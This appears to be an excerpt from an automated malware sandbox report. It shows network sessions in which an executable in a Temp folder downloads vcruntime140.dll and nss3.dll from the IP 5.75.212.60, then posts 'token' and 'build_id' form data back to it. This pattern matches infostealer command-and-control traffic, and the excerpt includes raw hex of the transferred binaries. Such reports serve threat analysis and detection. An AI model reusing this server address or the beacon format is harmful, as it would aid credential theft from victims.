2024-07-26 10:57:36 UTC	16384	IN	Data Raw: 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 Data Ascii: uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
2024-07-26 10:57:36 UTC	16384	IN	Data Raw: 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c Data Ascii: ]]USWVu@$xTv4{F4^@KN@P\|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4\|
2024-07-26 10:57:36 UTC	16384	IN	Data Raw: c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	60820	5.75.212.60	443	2260	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 10:57:37 UTC	246	OUT	GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 10:57:37 UTC	259	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 10:57:37 GMT Content-Type: application/octet-stream Content-Length: 80880 Connection: close Last-Modified: Friday, 26-Jul-2024 10:57:37 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-07-26 10:57:37 UTC	16125	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"
2024-07-26 10:57:37 UTC	16384	IN	Data Raw: 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 Data Ascii: t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;B
2024-07-26 10:57:38 UTC	16384	IN	Data Raw: 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 Data Ascii: EEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt
2024-07-26 10:57:38 UTC	16384	IN	Data Raw: c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 Data Ascii: ttt@++t+t+u+uQ<0\|*<9&w/c5~bASJCtv
2024-07-26 10:57:38 UTC	15603	IN	Data Raw: 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f Data Ascii: @L\|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicroso

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	60823	5.75.212.60	443	2260	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 10:57:39 UTC	238	OUT	GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 10:57:39 UTC	261	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 10:57:39 GMT Content-Type: application/octet-stream Content-Length: 2046288 Connection: close Last-Modified: Friday, 26-Jul-2024 10:57:39 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-07-26 10:57:39 UTC	16123	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
2024-07-26 10:57:39 UTC	16384	IN	Data Raw: f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51 Data Ascii: kd)i)ff f@U \|AAIQQAEq@AfAAi)\f fR \|9U\|&AVQ\|A@fAfAA1<MAQ
2024-07-26 10:57:39 UTC	16384	IN	Data Raw: 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b Data Ascii: Q=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`\|$\tD$euL$PhD$TD$E
2024-07-26 10:57:39 UTC	16384	IN	Data Raw: 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d Data Ascii: @;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
2024-07-26 10:57:39 UTC	16384	IN	Data Raw: 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10 Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
2024-07-26 10:57:39 UTC	16384	IN	Data Raw: d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00 Data Ascii: %D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
2024-07-26 10:57:39 UTC	16384	IN	Data Raw: 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 Data Ascii: 8C0;^h\|D$Fh\|$urVd@\|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$\|$D$pdD$H<@D>D$1V>D$>D$>D$\$
2024-07-26 10:57:39 UTC	16384	IN	Data Raw: 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-Mm
2024-07-26 10:57:39 UTC	16384	IN	Data Raw: e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 Data Ascii: `P19F$WtL$ u\|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rtt
2024-07-26 10:57:39 UTC	16384	IN	Data Raw: 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 Data Ascii: 4D$$D$@@L$;A<\|$7h't$D$$hH\|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	60827	5.75.212.60	443	2260	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 10:57:42 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEBKKEGDBFIIEBFHIEHC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 10:57:42 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 65 39 34 62 62 63 32 63 38 33 62 36 66 36 33 38 36 64 31 64 30 61 66 63 65 31 32 64 36 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 30 63 39 39 65 39 66 66 30 62 39 35 33 35 35 65 38 65 63 31 39 63 35 34 38 61 62 30 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 43 0d 0a 43 6f 6e 74 Data Ascii: ------JEBKKEGDBFIIEBFHIEHCContent-Disposition: form-data; name="token"0ee94bbc2c83b6f6386d1d0afce12d6c------JEBKKEGDBFIIEBFHIEHCContent-Disposition: form-data; name="build_id"e0c99e9ff0b95355e8ec19c548ab0f83------JEBKKEGDBFIIEBFHIEHCCont
2024-07-26 10:57:42 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 10:57:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
